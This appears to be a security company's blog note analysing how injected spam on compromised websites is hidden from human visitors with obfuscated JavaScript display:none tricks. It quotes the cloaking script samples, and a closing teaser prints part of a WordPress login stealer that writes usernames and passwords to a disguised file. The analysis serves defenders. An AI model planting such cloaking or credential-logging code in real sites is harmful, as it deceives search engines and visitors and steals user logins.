Obfuscating display:none cloaking

Labs Note

We’ve seen lots of JavaScript tricks that hide injected spam from human visitors while making it look “visible” for search engines.

The most popular approach is applying the display:none style to a spam block like here:

<div id="tesi"><strong style="font-weight: 400">...SPAMMY CONTENT HERE...</div><script>document.getElementById("t"+"e"+"s"+"i").style.display='none';</script>	

Here you can see a div block with id tesi, followed by a JavaScript that makes the element tesi invisible.

This looks obvious when you see it but may be not as obvious to search engine bots that need to figure out how the JavaScript code affects visibility of a particular content. To make thing even more difficult, the element id in the script is slightly obfuscated “t”+”e”+”s”+”i” and you really need to execute the code to identify the element it works with.

A more interesting obfuscation is used in the __e_accelerate campaign that we wrote about last week. The injected content consist of multiple blocks like this:

<script language="JavaScript">vouhihni='bumnajmi';imppkmat="none";</script><blockquote id="bumnajmi">...SPAMMY CONTENT HERE...</blockquote>

At first glance, the JavaScript code does’t make any sence. Although we can see the id of the spam block there bumnajmi and the imppkmat=”none”; part implies that it hides something. But we don’t see what makes the bumnajmi element hidden.

The answer lies in the trailing JavaScript block:

<script language="JavaScript">sucoy=document.getElementById(vouhihni); sucoy.style.display=imppkmat;</script>

This block glues the parts of the first block together. The first variable is used to select a DOM element. And the second variable is used to make the selected element invisible.

While this trick may fool some search engines into indexing the spammy content while keeping the spam invisble to human visitors, it’s still not a problem for website security scanners like our SiteCheck that see and report the spam.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post